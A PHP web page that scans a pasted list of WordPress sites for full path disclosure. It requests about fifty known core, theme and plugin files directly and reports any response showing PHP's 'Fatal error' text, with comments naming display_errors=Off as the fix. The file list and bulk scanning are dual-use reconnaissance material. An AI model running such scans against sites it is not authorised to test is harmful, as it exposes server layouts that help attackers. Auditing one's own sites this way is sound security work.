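<?php

declare(strict_types=1);

/*
 * WordPress full path disclosure (FPD) check.
 *
 * When a server has display_errors enabled, requesting one of the listed
 * PHP files directly (outside the WordPress bootstrap) makes PHP print a
 * "Fatal error" message that includes the file's absolute filesystem path.
 * This page reports every URL whose response body contains that marker;
 * a site with display_errors=Off (errors logged, not rendered) produces no
 * findings, which is the server-side fix for this class of leak.
 *
 * Changes from the original paste: submitted lines are trimmed (browsers
 * send CRLF, so explode("\n") left a "\r" on every URL), blank and non-http
 * lines are skipped so this page cannot be pointed at local stream
 * wrappers, fetch failures are handled explicitly instead of with "@",
 * and findings are HTML-escaped before being echoed back (the URLs come
 * straight from the request, so the old echo was a reflected XSS).
 */

/** Relative paths that are known to emit a fatal error when hit directly. */
const FPD_PATHS = [
    "/wp-content/themes/dt-chocolate/index.php",
    "/wp-content/themes/massimo/sp-framework/sp-wp-login.php",
    "/wp-content/themes/eggo/sp-framework/sp-wp-login.php",
    "/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./",
    "/wp-content/themes/slash/index.php",
    "/wp-content/plugins/vote-it-up/voteitup.php",
    "/wp-content/plugins/wp-polls/polls-templates.php",
    "/wp-content/plugins/ultimate-security-check/wp-ultimate-security.php",
    "/wp-content/plugins/dynamic-headers/custom-header.php",
    "/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php",
    "/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php",
    "/wp-content/plugins/wp-events/wp-events.php",
    "/wp-content/plugins/wp-super-cache/wp-cache.php",
    "/wp-content/plugins/admin-menu-editor/menu-editor.php",
    "/wp-content/plugins/wp-photo-album/wppa.php",
    "/wp-content/plugins/wordpress-multibox-plugin/multibox.php",
    "/wp-content/plugins/superslider-show/superslider-show.php",
    "/wp-content/themes/sahifa/category.php",
    "/wp-content/themes/moneymasters/index.php",
    "/wp-content/plugins/sitepress-multilingual-cms/sitepress.php",
    "/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/",
    "/wp-settings.php",
    "/wp-includes/admin-bar.php",
    "/wp-includes/author-template.php",
    "/wp-includes/canonical.php",
    "/wp-includes/category-template.php",
    "/wp-includes/class-wp-embed.php",
    "/wp-includes/media.php",
    "/wp-includes/ms-default-constants.php",
    "/wp-includes/ms-default-filters.php",
    "/wp-includes/ms-settings.php",
    "/wp-includes/post.php",
    "/wp-includes/rss.php",
    "/wp-includes/user.php",
    "/wp-includes/theme.php",
    "/wp-includes/vars.php",
    "/wp-includes/class-wp-http-ixr-client.php",
    "/wp-includes/class-wp-image-editor-gd.php",
    "/wp-includes/class-wp-image-editor-imagick.php",
    "/wp-includes/class-wp-xmlrpc-server.php",
    "/wp-includes/class.wp-scripts.php",
    "/wp-includes/class.wp-styles.php",
    "/wp-includes/comment-template.php",
    "/wp-includes/default-filters.php",
    "/wp-includes/default-widgets.php",
    "/wp-includes/feed-atom-comments.php",
    "/wp-includes/feed-atom.php",
    "/wp-includes/feed-rdf.php",
    "/wp-includes/feed-rss.php",
    "/wp-includes/feed-rss2-comments.php",
    "/wp-includes/feed-rss2.php",
    "/wp-includes/functions.php",
];

/**
 * Turn the raw textarea contents into a list of base URLs.
 *
 * Each line is trimmed and any trailing "/" removed (so joining with a
 * path never yields "//"); blank lines are dropped; only syntactically
 * valid http/https URLs are kept, which stops the page itself from being
 * used to read file:// or other local wrappers on the host it runs on.
 *
 * @return list<string>
 */
function fpd_read_sites(string $raw): array
{
    $sites = [];
    // \R matches CRLF, LF and CR, whatever the browser submitted.
    foreach (preg_split('/\R/', $raw) ?: [] as $line) {
        $site = rtrim(trim($line), '/');
        if ($site === '') {
            continue;
        }
        $scheme = strtolower((string) parse_url($site, PHP_URL_SCHEME));
        if (!in_array($scheme, ['http', 'https'], true)) {
            continue;
        }
        if (filter_var($site, FILTER_VALIDATE_URL) === false) {
            continue;
        }
        $sites[] = $site;
    }

    return $sites;
}

/**
 * Fetch $url and report whether the body carries PHP's "Fatal error" marker.
 *
 * A failed fetch (DNS, connection, HTTP error, no allow_url_fopen) counts
 * as "not disclosing"; the warning file_get_contents emits in that case is
 * swallowed by a scoped handler rather than with the "@" operator so that
 * it never leaks into the rendered page.
 */
function fpd_discloses_path(string $url): bool
{
    set_error_handler(static fn (): bool => true);
    try {
        $body = file_get_contents($url);
    } finally {
        restore_error_handler();
    }

    return $body !== false && str_contains($body, 'Fatal error');
}

// Collect findings before rendering so the form always appears first,
// exactly as in the original page layout.
$findings = [];
if (isset($_POST['scan'])) {
    foreach (fpd_read_sites((string) ($_POST['sites'] ?? '')) as $site) {
        foreach (FPD_PATHS as $path) {
            if (fpd_discloses_path($site . $path)) {
                $findings[] = $site . $path;
            }
        }
    }
}
?>
<form method="post">
<h3> Wordpress Full Path Disclosure Scanner </h3>
<textarea name=sites cols=35 rows=20 placeholder="put wordpress sites here"></textarea>
<br />
<input name=scan type=submit value=scan>
</form>
<?php
foreach ($findings as $finding) {
    echo "<hr>";
    // The URL is attacker-controlled request input; escape it for the HTML context.
    echo 'vuln : ' . htmlspecialchars($finding, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . " <br />";
}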